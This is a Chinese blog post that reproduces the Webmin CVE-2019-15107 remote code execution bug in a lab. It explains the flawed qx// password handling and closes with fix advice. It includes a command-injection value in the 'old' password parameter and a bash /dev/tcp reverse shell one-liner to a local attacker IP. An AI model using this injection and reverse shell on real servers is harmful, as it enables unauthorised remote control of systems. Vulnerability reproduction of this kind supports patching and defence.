webmin 远程代码漏洞复现

漏洞简介

webmin是一款强大的Unix系统管理工具,在其版本为1.882到1.920存在CVE-2019-15107漏洞,当版本为1.890时,工具在默认配置下易受漏洞的威胁,而在其它版本当用户关闭密码过期策略时,受漏洞威胁的概率较小,漏洞主要是起代码中引用‘qx/ /’方法,把密码字符串当作命令执行

漏洞环境搭建

Webmin 1.920

kali执行终端命令:wget https://sourceforge.net/projects/webadmin/files/webmin/1.920/webmin_1.920_all.deb/download

或者从vulhub中直接拉取镜像(webmin1.910)

3.1.2.4 漏洞复现

安装webmin1.920,并从其给的提示修改初始密码并登录

设置为允许修改新密码

 

浏览器里打开password_change.cgi,发现提示外部url,并且给出修改提示。

按提示修改

打开burp抓包(webmin的password_change.cgi界面),把抓到的包修改为修改密码的请求包发送到repeater

 

 

尝试反弹shell

将命令 bash -c “bash -i >& /dev/tcp/192.168.202.128/4444 0>&1” 进行url编码

将编码后的数字换到“old=11|id”中的id,然后打开kali监听4444端口,回到burp重新,发送请求包

 

 

 

成功返弹shell

至此漏洞复现成功

 3.1.2.5 修复建议

(1).找到漏洞代码,将,qx/$in{‘old’}/)代码删除

(2)下载最新版本webmin

本文链接:https://my.lmcjl.com/post/7492.html

展开阅读全文

4 评论

留下您的评论.